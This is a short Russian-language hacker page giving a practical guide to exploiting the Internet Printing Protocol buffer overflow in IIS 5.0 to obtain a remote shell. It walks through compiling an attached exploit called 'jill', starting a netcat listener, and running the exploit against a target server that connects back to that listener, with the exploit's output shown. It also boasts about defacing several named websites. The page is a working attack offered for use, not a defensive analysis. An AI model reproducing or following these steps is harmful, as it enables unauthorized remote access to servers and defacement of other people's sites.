| 
div.main {margin-left: 20pt; margin-right: 20pt}Дырка IPP: практическое руководство.              С 19 апреля в инете было очень весело из-за дырени Internet 
            Printing Protocol buffer overflow в IIS 5.0. Сия радость дает нам (и 
            сколько еще даст) удаленный шелл на серваках под NT_IIS 5.0. Только 
            сегодня уже стало просто лень дефасить сайты. 
            Для примера : http://mededinteractive.com/ (картинка) http://royalfamily.org/ (картинка) http://lexington.com/  (картинка) 
            Как юзать? Просто очень. 
            Заливай exploit (прилагается), 
            компили. Затем заливай NetCat (прилагается) 
            запускай под виндой командой: 
            netcat -l -p 12312 -vv (где 12312 - порт на котором установлен 
            слухач).  
            Теперь можно под юнихом запустить скомпиленный exploit: 
            ../jill www.dead-server.com 80 my_nt_machine_with_Netcat 
12312 
            iis5 remote .printer overflow. dark spyrit 
            <dspyrit@beavuh.org> / beavuh 
            labs. connecting... sent... you may need to send a carriage 
            on your listener if the shell doesn't appear. have fun! 
            Все, после того как exploit кинул на сервак кучу мусора, твой 
            запущенный NetCat на порту 12312 получает удаленный шелл 
            сервака.  
            Теперь можно ваять что угодно.  
 |